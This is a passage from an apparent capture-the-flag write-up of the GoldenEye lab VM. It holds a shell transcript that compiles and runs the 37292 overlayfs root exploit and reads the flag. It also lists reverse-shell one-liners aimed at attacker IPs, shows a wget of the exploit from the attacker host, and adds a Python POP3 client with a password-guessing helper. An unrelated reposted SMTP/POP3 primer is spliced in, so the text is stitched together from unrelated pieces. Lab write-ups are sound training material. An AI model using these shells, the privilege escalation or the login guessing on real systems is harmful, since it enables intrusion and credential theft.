The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc 37292.c.1 -o exp2
cc 37292.c.1 -o exp2
37292.c.1: file not recognized: File format not recognized
clang: error: linker command failed with exit code 1 (use -v to see invocation)
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ mv 37292.c.1 37292-2.c
mv 37292.c.1 37292-2.c
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc 37292-2.c -o exp2
cc 37292-2.c -o exp2
37292-2.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292-2.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292-2.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292-2.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292-2.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ls
ls
37292-2.c changelog.txt config.php editor_plugin.js exp2 includes
37292.c classes css editor_plugin_src.js img rpc.php
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ./exp2
./exp2
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# ls /root
ls /root
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls
ls
# ls /root
ls /root
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/flag.txt
cat /root/flag.txt
cat: /root/flag.txt: No such file or directory
# pwd
pwd
/root
# ls
ls
# ls -al
ls -al
total 44
drwx------ 3 root root 4096 Apr 29 2018 .
drwxr-xr-x 22 root root 4096 Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 2018 .rnd
-rw------- 1 root root 8296 Apr 29 2018 .viminfo
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
568628e0d993b1973adc718237da6e93
Alternative to the Metasploit session: a manual reverse shell. Any of these one-liners can be used as the command the Moodle spell checker runs, with a listener waiting on the attacker box; the shell arrives as www-data in the same spellchecker plugin directory. The first line still carries a different listener address (10.211.55.28, not this lab's attacker), the second is the telnet-based command that Metasploit's cmd/unix/reverse payload generates, and the third is the Python one-liner pointed at 192.168.219.177:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.211.55.28",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
sh -c '(sleep 3655|telnet 192.168.219.177 4444|while : ; do sh && break; done 2>&1|telnet 192.168.219.177 4444 >/dev/null 2>&1 &)'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.219.177",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
┌──(pinginglab㉿pinginglab)-[~]
└─$ nc -vlp 6666
listening on [any] 6666 ...
connect to [192.168.219.177] from severnaya-station.com [192.168.219.179] 41004
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ ls
37292-2.c
37292.c
changelog.txt
classes
config.php
css
editor_plugin.js
editor_plugin_src.js
exp2
img
includes
rpc.php
$ ./exp2
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
# ls
# ls -al
total 44
drwx------ 3 root root 4096 Apr 29 2018 .
drwxr-xr-x 22 root root 4096 Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 2018 .rnd
-rw------- 1 root root 8296 Apr 29 2018 .viminfo
# cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
# exit
$ uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ wget http://192.168.219.177:8888/37292.c
--2022-12-24 06:14:47-- http://192.168.219.177:8888/37292.c
Connecting to 192.168.219.177:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: '37292.c.1'
0K .... 100% 874M=0s
2022-12-24 06:14:47 (874 MB/s) - '37292.c.1' saved [4968/4968]
$ ls
37292-2.c
37292.c
37292.c.1
changelog.txt
classes
config.php
css
editor_plugin.js
editor_plugin_src.js
exp2
img
includes
rpc.php
$ cc 37292.c.1 -o exp22
37292.c.1: file not recognized: File format not recognized
clang: error: linker command failed with exit code 1 (use -v to see invocation)
$ cc 37292.c -o exp22
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
$ ./exp22
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 1: gcc: not found
couldn't create dynamic library
$ ls
37292-2.c
37292.c
37292.c.1
changelog.txt
classes
config.php
css
editor_plugin.js
editor_plugin_src.js
exp2
exp22
img
includes
rpc.php
$ mv 37292.c.1 3729222.c
$ cc 3729222.c -o exp22
3729222.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
3729222.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
3729222.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
3729222.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
3729222.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
$ ./exp22
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# ls
37292-2.c
37292.c
3729222.c
changelog.txt
classes
config.php
css
editor_plugin.js
editor_plugin_src.js
exp2
exp22
img
includes
rpc.php
# cd /root
# ls -al
total 44
drwx------ 3 root root 4096 Apr 29 2018 .
drwxr-xr-x 22 root root 4096 Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 2018 .rnd
-rw------- 1 root root 8296 Apr 29 2018 .viminfo
# cat ./flag.txt
cat: ./flag.txt: No such file or directory
# cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
#
PS: the target has no gcc, so everything has to be built with cc. 37292.c also shells out to gcc at run time to build its helper shared library, which is why the unmodified copy failed above with "sh: 1: gcc: not found" / "couldn't create dynamic library" while the copy edited to call cc gave root.
Introduction to mail transfer protocols
1. The concept of mail transfer
Mail service is one of the most widely used services on the Internet. It provides communication that is independent of the operating-system platform: with it, users exchange data between networks by e-mail. Mail transfer covers sending a message from the sender's client to the mail server, and the recipient retrieving the message from the mail server to the recipient's client.
2. SMTP and POP3
In the TCP/IP protocol suite, SMTP is generally used to send mail and POP3 to receive it.
SMTP, in full Simple Message Transfer Protocol (the Simple Mail Transfer Protocol), works at the application layer of the TCP/IP stack. SMTP uses the client/server model, listens on TCP port 25 by default, and provides reliable mail sending.
POP3, in full Post Office Protocol 3 (Post Office Protocol, version 3), works at the application layer of the TCP/IP stack. POP3 uses the client/server model, listens on TCP port 110 by default, and provides reliable mail retrieval.
3. How SMTP and POP3 work
Sending and receiving mail both involve two components: the user agent (UA; Foxmail and Outlook are common ones) and the SMTP/POP3 server.
How SMTP works:
1) The client connects to TCP port 25 of the SMTP server;
2) The client sends a HELO message to tell the SMTP server its domain address;
3) The SMTP server accepts the connection request and sends the client a message requesting the account and password;
4) The client sends the account and password to the SMTP server; if verification succeeds, the server sends an OK to the client, meaning message transfer may begin;
5) The client uses the MAIL command to send the sender's name to the SMTP server;
6) The SMTP server responds with OK;
7) The client uses the RCPT command to send the recipient's address; if the SMTP server recognizes the address it sends OK to the client, otherwise it rejects the request;
8) After receiving OK from the SMTP server, the client sends the message data with the DATA command;
9) The client sends the QUIT command to end the connection.
How POP3 works:
1) The client connects to TCP port 110 of the mail server;
2) The client sends the mailbox account to the POP3 server with the USER command;
3) The client sends the mailbox password to the POP3 server with the PASS command;
4) After the user is authenticated, the client uses the STAT command to ask the server for mailbox statistics;
5) The client uses the LIST command to list the number of messages on the server;
6) The client uses the RETR command to receive messages; after receiving one, it uses the DELE command to mark that message as deleted on the server;
7) The client sends the QUIT command; the mail server deletes the messages marked for deletion and the connection ends.
(Note: the client UA can be configured to keep a copy of the mail on the mail server instead of deleting it.)
————————————————
Copyright notice: this section is an original article by CSDN blogger "Harrison_zhu", released under the CC 4.0 BY-SA licence; reproduction must include a link to the original and this notice.
Original link: https://blog.csdn.net/Harrison_zhu/article/details/2677863
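The nc session against port 55007 earlier in the page and the POP3 walk-through just above describe the same client/server exchange. The following is an added example, not from the original post or the VM: a small hand-rolled POP3 client (USER/PASS/LIST/RETR/QUIT, with dot-unstuffing of multi-line replies) and an in-process fake server with a constructed mailbox so that it runs offline. The loopback port, the mailbox contents and the function names are assumptions; against the real target the client would be created as `Pop3Client("192.168.219.179", 55007)`.

```python
import socket
import threading

# Constructed mailbox for the in-process fake server (user -> (password, messages));
# the message has a body line starting with "." so the exchange exercises dot-stuffing.
MAILBOXES = {"natalya": ("bird", ["From: root@ubuntu\r\nTo: natalya\r\n\r\nusername: xenia\r\n"
                                   ".hidden: a body line that starts with a dot\r\n"])}

class Pop3Error(Exception):
    """Server replied -ERR, or the connection went away."""

def _serve_one(conn):
    """Fake server side (USER/PASS/LIST/RETR/QUIT) with Dovecot-style replies. RETR
    byte-stuffs: a body line that starts with "." is sent as ".." (RFC 1939)."""
    rd, user, authed = conn.makefile("rb"), None, False
    conn.sendall(b"+OK GoldenEye POP3 Electronic-Mail System\r\n")
    for raw in rd:
        cmd, _, arg = raw.decode("latin-1").rstrip("\r\n").partition(" ")
        cmd, msgs = cmd.upper(), MAILBOXES.get(user, ("", []))[1]
        if cmd == "QUIT":
            conn.sendall(b"+OK Logging out.\r\n")
            break
        if cmd == "USER":
            user, reply = arg.lower(), "+OK"
        elif cmd == "PASS":
            authed = user in MAILBOXES and MAILBOXES[user][0] == arg
            reply = "+OK Logged in." if authed else "-ERR [AUTH] Authentication failed."
        elif cmd == "LIST" and authed:
            reply = f"+OK {len(msgs)} messages:\r\n" + "".join(f"{i} {len(m)}\r\n" for i, m in enumerate(msgs, 1)) + "."
        elif cmd == "RETR" and authed and arg.isdigit() and 1 <= int(arg) <= len(msgs):
            body = msgs[int(arg) - 1]
            reply = f"+OK {len(body)} octets\r\n" + "".join(("." if l.startswith(".") else "") + l + "\r\n" for l in body.split("\r\n")[:-1]) + "."
        else:
            reply = f"-ERR Unknown command: {cmd}"
        conn.sendall((reply + "\r\n").encode("latin-1"))
    conn.close()

def start_fake_pop3():
    """Serve MAILBOXES on a free loopback port from a background thread; return the port."""
    srv = socket.create_server(("127.0.0.1", 0))
    def loop():
        while True:
            _serve_one(srv.accept()[0])
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]

class Pop3Client:
    """Client side of the exchange typed by hand with nc above."""
    def __init__(self, host, port, timeout=5.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.rd = self.sock.makefile("rb")
        self.banner = self._cmd()  # greeting, e.g. "+OK GoldenEye POP3 Electronic-Mail System"

    def _cmd(self, line=None):
        """Send one command (None = just read the greeting) and require a +OK status line."""
        if line is not None:
            self.sock.sendall((line + "\r\n").encode("latin-1"))
        status = self.rd.readline().decode("latin-1").rstrip("\r\n")
        if not status.startswith("+OK"):
            raise Pop3Error(status or "connection closed")
        return status

    def _multiline(self):
        """Read up to the lone '.' terminator, undoing dot-stuffing on the way."""
        lines = []
        for raw in self.rd:
            line = raw.decode("latin-1").rstrip("\r\n")
            if line == ".":
                return lines
            lines.append(line[1:] if line.startswith(".") else line)
        raise Pop3Error("connection closed mid-response")

    def login(self, user, password):
        self._cmd(f"USER {user}")
        return self._cmd(f"PASS {password}")

    def list(self):
        self._cmd("LIST")
        return [(int(n), int(size)) for n, size in (l.split() for l in self._multiline())]

    def retr(self, num):
        self._cmd(f"RETR {num}")
        return "\r\n".join(self._multiline()) + "\r\n"

    def quit(self):
        self._cmd("QUIT")
        self.sock.close()

def check_login(host, port, user, password):
    """One hydra-style attempt on its own connection: the PASS status line, or the -ERR text."""
    client = Pop3Client(host, port)
    try:
        return client.login(user, password)
    except Pop3Error as err:
        return str(err)
    finally:
        client.quit()
```

`check_login` opens a fresh connection per guess, which is what hydra does; Dovecot's "Disconnected for inactivity during authentication" errors in the hydra output above come from connections that sat idle in its 16-task pool, so a slower, serial loop like this one tends to produce cleaner results against that server.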